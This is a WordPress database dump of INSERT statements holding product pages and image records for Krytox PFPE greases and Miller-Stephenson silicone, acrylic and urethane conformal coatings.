INSERT INTO `wp_posts` VALUES (713, 2, '2016-08-23 15:19:06', '2016-08-23 15:19:06', 'Krytox AUT 2045 performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers. Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox AUT 2045 during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox AUT 2045 provides longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\nKrytox AUT 2045 grease typically lasts 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.', 'AUT 2045', 'Krytox AUT 2045 is a white grease based on perfluoropolyether (PFPE). PFPE lubricants demonstrate outstanding product life and unequaled performance. AUT 2045, like most greases, combines the base oil with polytetrafluoroethylene (PTFE) powder as a thickener. The use of PFPE as a base oil provides superior chemical and thermal stability to all grease product lines.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-aut-2045', '', '', '2016-10-05 19:20:18', '2016-10-05 19:20:18', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=713', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (714, 2, '2016-08-23 15:22:07', '2016-08-23 15:22:07', 'Krytox AUT 2245 performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers. Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox AUT 2245 during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox AUT 2245 provides longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\nKrytox AUT 2245 grease typically lasts 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.', 'AUT 2245', 'Krytox AUT 2245 grease addresses a broad range of applications from o-ring to bearing lubrication over a wide temperature range where corrosion is a potential issue. It is thickened with polytetrafluoroethylene (PTFE) and contains sodium nitrite, a traditional anti-corrosion additive.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-aut-2245', '', '', '2016-10-05 19:22:56', '2016-10-05 19:22:56', '', 0, 'https://132.148.10.86/wordpress/product/aut-2245/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (715, 2, '2016-08-23 15:23:47', '2016-08-23 15:23:47', 'Krytox AUT 2A45 greases offer the potential for lubed-for-life properties in demanding electrical motor service. Krytox greases are non-oxidizing, water-resistant, nonflammable, and chemically inert.\r\n\r\nKrytox AUT 2A45 greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener.\r\n\r\nThe PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubricants from the motor bearings before application.\r\n\r\nKrytox AUT 2A45 grease offers the following benefits and features:\r\n<strong>Unsurpassed oxidation resistance of base oil </strong>\r\nPFPE will not oxidize and gum up with age and use. Will not break down with high temperatures experienced in electric motors. Operating temperature range from –44 to 200 °C (–47 to 392 °F)\r\n\r\n<strong>Advanced PTFE thickener</strong>\r\nSpecial high efficiency thickener will not oxidize or break down with shear\r\n\r\n<strong>Lubed-for-life potential</strong>\r\nTypically, no need to re-lubricate bearings during lifetime of electric motor\r\n\r\n<strong>Excellent corrosion resistance</strong>\r\nAdditives offer resistance to corrosion and rust during storage and in wet environments', 'AUT 2A45', 'Krytox AUT 2A45 grease is formulated with soluble additives that exhibit excellent resistance to water washout, repel moisture, and provide extra protection from corrosion of metal parts and bearing surfaces. With no solid additives, bearings run quieter and wear less, extending bearing and component life.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-aut-2a45', '', '', '2016-10-05 19:53:19', '2016-10-05 19:53:19', '', 0, 'https://132.148.10.86/wordpress/product/aut-2a45/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (716, 2, '2016-08-23 15:28:35', '2016-08-23 15:28:35', '', 'Application', '', 'publish', 'closed', 'closed', '', 'application', '', '', '2017-06-07 14:35:17', '2017-06-07 14:35:17', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=716', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (717, 2, '2016-08-23 16:58:37', '2016-08-23 16:58:37', 'Krytox AUT 2E45 greases offer the potential for lubed-for-life properties in demanding electrical motor service. Krytox greases are non-oxidizing, water-resistant, nonflammable, and chemically inert.\r\n\r\nKrytox AUT 2E45 greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener.\r\n\r\nThe PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubricants from the motor bearings before application.\r\n\r\nKrytox AUT 2E45 grease offers the following benefits and features:\r\n<strong>Unsurpassed oxidation resistance of base oil </strong>\r\nPFPE will not oxidize and gum up with age and use. Will not break down with high temperatures experienced in electric motors. Operating temperature range from –44 to 200 °C (–47 to 392 °F)\r\n\r\n<strong>Advanced PTFE thickener</strong>\r\nSpecial high efficiency thickener will not oxidize or break down with shear\r\n\r\n<strong>Lubed-for-life potential</strong>\r\nTypically, no need to re-lubricate bearings during lifetime of electric motor\r\n\r\n<strong>Excellent corrosion resistance</strong>\r\nAdditives offer resistance to corrosion and rust during storage and in wet environments\r\n\r\n\r\n', 'AUT 2E45', 'Krytox AUT 2E45 grease is a nitrite-free lubricant, formulated with anti-rust additives that are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-aut-2e45', '', '', '2016-10-05 19:46:57', '2016-10-05 19:46:57', '', 0, 'https://132.148.10.86/wordpress/product/aut-2e45/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (718, 2, '2016-08-23 17:00:31', '2016-08-23 17:00:31', '', 'Krytox AUT 2E45', '', 'inherit', 'open', 'closed', '', 'shutterstock_97401731', '', '', '2016-10-03 14:40:48', '2016-10-03 14:40:48', '', 717, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_97401731.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (719, 2, '2016-08-23 17:05:04', '2016-08-23 17:05:04', '', 'Specifications Met', '', 'publish', 'closed', 'closed', '', 'specifications-met', '', '', '2016-09-27 13:30:11', '2016-09-27 13:30:11', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=719', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (720, 2, '2016-10-05 17:32:43', '2016-10-05 17:32:43', 'Krytox XHT AC grease is a special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400°F). Krytox XHT AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\n\nThe Krytox XHT AC series greases are an extension of the Krytox 240 series and Krytox GPL 22X series, but are designed to give higher performance in the 204–302°C (400–575 °F) range. Krytox™ XHT-AC series greases contain sodium nitrite to offer anti-corrosion performance. These greases should be used below 320 °C (608 °F), where the polytetrafluoroethylene (PTFE) thickener could begin to melt. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Krytox grease is made to a standard NLGI grade 2. PTFE is the standard thickener.\n\nApplications for these lubricants are generally of a critical nature, such as when temperatures reach extremes that conventional lubricants cannot handle. Krytox XHT AC and XHT ACX greases are expected to be durable in highly aggressive environments. Where failure of components is not an option, because of durability, warranty, safety, loss of productivity, or downtime, Krytox lubricants are the ideal choice in a wide range of industries and applications.\n\n<strong>Compatibility with Metals</strong>\nBecause of their low surface tensions, Krytox lubricants easily wet metallic surfaces. Krytox lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 °F). Above 288 °C (550 °F), many alloy steels, stainless steels, and other metals, such as aluminum alloy, titanium alloy, nickel alloy, and cobalt alloy, can be used with Krytox lubricants.', 'XHT-AC', 'Krytox XHT-AC and XHT-ACX greases are special high temperature greases with low oil evaporation that provide anti-wear and rusting protection, and are compatible with all elastomers and plastics. These greases have excellent lubrication over a broad temperature range, but are designed to work best at temperatures over 200 °C (400 °F). Krytox XHT-AC series greases are nonflammable, oxygen-compatible, and chemically inert. Krytox greases provide extended lubrication intervals and longer equipment life.\n<br /><br />\nLowest viscosity grease in the XHT-AC series.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\n', 'inherit', 'closed', 'closed', '', '672-autosave-v1', '', '', '2016-10-05 17:32:43', '2016-10-05 17:32:43', '', 672, 'https://132.148.10.86/wordpress/672-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (722, 2, '2016-08-23 17:44:39', '2016-08-23 17:44:39', '', 'Krytox XHT-ACX', '', 'inherit', 'open', 'closed', '', 'shutterstock_292901249', '', '', '2016-10-05 17:36:36', '2016-10-05 17:36:36', '', 674, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_292901249.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (723, 2, '2016-08-23 17:44:55', '2016-08-23 17:44:55', '', 'Krytox XHT AC', '', 'inherit', 'open', 'closed', '', 'shutterstock_340828220', '', '', '2016-10-05 17:30:50', '2016-10-05 17:30:50', '', 674, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_340828220.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (724, 2, '2016-08-23 17:45:08', '2016-08-23 17:45:08', '', 'Krytox XHT-BD', '', 'inherit', 'open', 'closed', '', 'shutterstock_361063190', '', '', '2016-10-05 17:56:24', '2016-10-05 17:56:24', '', 674, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_361063190.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (725, 2, '2016-08-23 17:54:29', '2016-08-23 17:54:29', '', 'Krytox XHT-BDZ', '', 'inherit', 'open', 'closed', '', 'shutterstock_68906731', '', '', '2016-10-05 18:03:32', '2016-10-05 18:03:32', '', 696, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_68906731.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (726, 2, '2016-08-23 17:54:43', '2016-08-23 17:54:43', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_105938183', '', '', '2016-08-23 17:54:52', '2016-08-23 17:54:52', '', 696, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_105938183.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (727, 2, '2016-08-23 18:52:30', '2016-08-23 18:52:30', '', 'shutterstock_93735121', '', 'inherit', 'open', 'closed', '', 'shutterstock_93735121', '', '', '2016-08-23 18:52:30', '2016-08-23 18:52:30', '', 671, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_93735121.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (728, 2, '2016-08-23 18:52:38', '2016-08-23 18:52:38', '', 'Krytox XHT-SX', '', 'inherit', 'open', 'closed', '', 'shutterstock_98038829', '', '', '2016-10-05 18:24:03', '2016-10-05 18:24:03', '', 671, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_98038829.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (729, 2, '2016-08-23 18:52:46', '2016-08-23 18:52:46', '', 'Krytox XHT-S', '', 'inherit', 'open', 'closed', '', 'shutterstock_102056233', '', '', '2016-10-05 18:21:36', '2016-10-05 18:21:36', '', 671, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_102056233.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (730, 2, '2016-08-23 18:52:59', '2016-08-23 18:52:59', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_326782289', '', '', '2016-08-23 18:53:44', '2016-08-23 18:53:44', '', 671, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_326782289.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (731, 2, '2016-08-23 19:22:59', '2016-08-23 19:22:59', '', 'krytox-xht-high-temperature-grease-oil', '', 'inherit', 'open', 'closed', '', 'shutterstock_373999234', '', '', '2016-08-23 19:23:17', '2016-08-23 19:23:17', '', 708, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_373999234.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (732, 3, '2016-08-23 19:43:26', '2016-08-23 19:43:26', 'Miller-Stephenson Silicone Electronic Coating ( MS-462H ) is a transparent, soft, flexible MIL-SPEC coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be "solder-through" for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approval. It is also compatible with WEEE and RoHS.\r\n<p class="content">Printed circuit boards (PCBs) form the foundation for electronics in automotive, consumer electronics, communications and industrial and energy applications. Yet these PCBs are often exposed to damaging environmental factors, ranging from moisture, dust and harsh chemicals to extreme thermal cycling and vibration.</p>\r\n<p class="content">Formulated from tough but flexible silicone technology, Miller-Stephenson\'s MS-462H Silicone Electronic Coating promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions includinga wide range of temperatures – from -45°C to 200°C. An additional benefit of silicone conformal coating is its excellent moisture protection. MS-462H is used in cases where there were extreme temperature differences, which resulted in excessive moisture.  Other conformal coatings failed within hours or days, while silicone, especially when applied thickly, has been proven to succeed.  One particular application was for electronically controlled heaters developed for artic temperatures.</p>\r\n<p class="content">After cure, Miller-Stephenson\'s Silicone Conformal Coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.</p>\r\n<p class="content"><a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a></p>\r\n<p class="content">More than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.</p>', 'MS-462H', 'Miller-Stephenson’s Silicone Conformal Coating is a transparent, soft, flexible coating which offers excellent moisture resistance, good dielectric properties, and excellent light transmission capabilities for solar applications.  It has good weatherability and resistance to U.V. light and dirt pick-up.  This coating can be “solder-through” for easy repair. Contains Dow Corning 1-2577 silicone resin. This silicone resin meets the requirements of MIL-I-46058C, Type SR, IPC-CC-830B and  UL 746E approva. It is also compatible with WEEE and RoHS.', 'publish', 'open', 'closed', '', 'silicone-electronic-coating', '', '', '2017-04-28 12:26:27', '2017-04-28 12:26:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=732', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (733, 3, '2016-08-23 19:46:26', '2016-08-23 19:46:26', '<h2>MS-465C | Acrylic Conformal Coating</h2>\r\nMiller-Stephenson\'s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-465C | Acrylic Conformal Coating', 'Miller-Stephenson\'s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.', 'publish', 'open', 'closed', '', 'acrylic-conformal', '', '', '2017-06-21 16:24:26', '2017-06-21 16:24:26', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=733', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (734, 3, '2016-08-23 19:47:02', '2016-08-23 19:47:02', 'Miller-Stephenson’s Acrylic Coating is a non-flammable, tough, fast drying, abrasion resistant conformal coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\r\n\r\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-467C', 'Miller-Stephenson’s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.', 'publish', 'open', 'closed', '', 'acrylic-coating', '', '', '2016-10-11 15:00:56', '2016-10-11 15:00:56', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=734', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (735, 3, '2016-08-23 19:48:14', '2016-08-23 19:48:14', '<h2>MS-470C | Urethane Conformal Coatings</h2>\r\n<h3>Superior Toughness, Abrasion Resistance, and Chemical Stability</h3>\r\nMiller-Stephenson\'s MS-470C Urethane Conformal Coatings offer superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson\'s Urethane Conformal Coatings have the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n</ul>\r\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. These Spray Conformal Coating are Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470C will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can.  MS-472C, the bulk liquid version of the product, is available in quarts and gallons for dip, brush, or spray applications and will cover 120 square feet per gallon at a 2-mil thickness. Printed circuit boards or electronics covered with urethane coating are repairable.  Simply heat the coating with a soldering iron to remove the components.\r\n\r\nUrethane Conformal Coatings provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\r\n\r\nMore than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.', 'MS-470C | Urethane Conformal Coatings', 'Miller-Stephenson\'s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson\'s Urethane Conformal Coating have the following benefits:\r\n<ul>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'urethane-conformal-coatings', '', '', '2017-06-21 15:52:14', '2017-06-21 15:52:14', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=735', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (736, 3, '2016-08-23 19:49:54', '2016-08-23 19:49:54', 'Miller-Stephenson’s Urethane Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson’s Urethane Conformal Coating have the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n</ul>\r\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\r\n\r\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470C will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can.  MS-472C, the bulk liquid version of the product, is available in quarts and gallons for dip, brush, or spray applications and will cover 120 square feet per gallon at a 2-mil thickness. Printed circuit boards or electronics covered with urethane coating are repairable.  Simply heat the coating with a soldering iron to remove the components.\r\n\r\nUrethane Conformal Coatings provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-472C', 'Miller-Stephenson’s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear, their hardness is second only to epoxy conformal coatings. However urethanes are much easier to be reworked than an epoxy. Miller-Stephenson’s Urethane Conformal Coating have the following benefits:\r\n<ul>\r\n 	<li>Reworkable and room temperature cure</li>\r\n 	<li>Solvent and discoloration resistant</li>\r\n 	<li>Fluorescent under UV light</li>\r\n 	<li>No cracking or crazing with vibration</li>\r\n 	<li>Superior toughness and abrasion resistance</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'urethane-coating', '', '', '2016-11-24 03:23:31', '2016-11-24 03:23:31', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=736', 0, 'product', '', 0); 
